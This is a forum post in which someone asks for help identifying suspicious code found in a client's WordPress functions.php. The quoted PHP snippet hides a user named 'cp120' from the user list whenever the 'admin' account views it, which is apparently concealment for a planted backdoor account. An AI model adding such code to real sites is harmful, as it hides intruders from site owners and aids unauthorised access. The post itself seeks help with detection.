I have a client that said they think their site is being hacked. I looked at some stuff and found some suspicious code in their functions.php file. Does anyone recognize any of this and feel it's not right?
    add_action('pre_user_query','yoursite_pre_user_query');
    function yoursite_pre_user_query($user_search) {
        global $current_user;
        $username = $current_user->user_login;
        if ($username == 'admin') {
            global $wpdb;
            $user_search->query_where = str_replace('WHERE 1=1',
                "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
        }
    }